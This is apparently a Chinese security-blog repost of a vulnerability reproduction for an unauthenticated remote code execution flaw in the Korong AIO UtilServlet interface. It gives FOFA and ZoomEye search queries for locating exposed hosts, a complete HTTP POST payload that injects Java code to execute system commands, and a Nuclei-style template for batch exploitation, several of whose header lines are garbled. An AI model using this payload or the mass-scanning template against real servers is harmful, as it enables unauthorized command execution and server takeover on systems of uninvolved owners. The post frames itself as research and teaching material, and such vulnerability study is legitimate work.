漏洞简介
科荣AIO UtilServlet 接口处存远程代码执行漏洞,未经身份验证的攻击者可通过该漏洞远程执行恶意代码,写入后门文件,可获取服务器权限。
漏洞复现
步骤一:使用以下搜索语法获取测试资产并确定测试目标~~~
# 搜索语法
fofa:body="changeAccount('8000')"
钟馗之眼:"changeAccount('8000')"
步骤二:使用以下数据包进行命令执行测试,查看相应包中的命令执行结果...
POST /UtilServlet HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+whoami").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field
步骤三:需要时间继续尝试漏洞的深度挖掘...
批量脚本
id: KRAIORCE
info:
name: KRAIORCE
author: Administrator
severity: high
description: KRAIORCE
reference:
https://
tags: tags
http:
raw:
|+
POST /UtilServlet HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 :
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 :
gzip, deflate :
Connection: close
Cookie: JSESSIONID=B90FC3948FCF2B938242B6EA2B9F267C
1 :
application/x-www-form-urlencoded :
326 :
operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+whoami").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field
and :
matchers:
type: word
part: body
words:
system
type: status
status:
200
原文始发于微信公众号(揽月安全团队):科荣AIO UtilServlet 前台RCE漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论